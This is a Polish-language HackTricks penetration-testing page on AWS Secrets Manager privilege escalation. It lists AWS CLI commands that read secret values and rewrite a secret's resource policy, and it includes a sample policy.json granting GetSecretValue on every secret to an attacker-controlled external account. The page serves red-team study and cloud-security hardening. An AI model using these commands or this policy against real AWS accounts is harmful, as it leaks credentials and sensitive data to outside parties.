AWS - Secrets Manager Privesc

Tip

Ucz się & ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Wspieraj HackTricks

Secrets Manager

Więcej informacji o Secrets Manager znajdziesz:

AWS - Secrets Manager Enum

secretsmanager:GetSecretValue

Attacker z tym uprawnieniem może uzyskać zapisaną wartość wewnątrz secretu w AWS Secretsmanager.

aws secretsmanager get-secret-value --secret-id <secret_name> # Get value

Potencjalny wpływ: Dostęp do bardzo wrażliwych danych przechowywanych w usłudze AWS Secrets Manager.

Warning

Należy pamiętać, że nawet mając uprawnienie secretsmanager:BatchGetSecretValue, atakujący potrzebowałby również secretsmanager:GetSecretValue, aby pobrać wrażliwe sekrety.

secretsmanager:GetResourcePolicy, secretsmanager:PutResourcePolicy, (secretsmanager:ListSecrets)

Przy wymienionych uprawnieniach możliwe jest udzielenie dostępu innym principalom/kontom (nawet zewnętrznym) do sekretu. Zauważ, że aby odczytać sekrety zaszyfrowane kluczem KMS, użytkownik musi także mieć dostęp do klucza KMS (więcej informacji na KMS Enum page).

aws secretsmanager list-secrets
aws secretsmanager get-resource-policy --secret-id <secret_name>
aws secretsmanager put-resource-policy --secret-id <secret_name> --resource-policy file:///tmp/policy.json

policy.json:

{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::<attackers_account>:root"
},
"Action": "secretsmanager:GetSecretValue",
"Resource": "*"
}
]
}

Tip

Ucz się & ćwicz AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Ucz się & ćwicz GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Ucz się & ćwicz Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Wspieraj HackTricks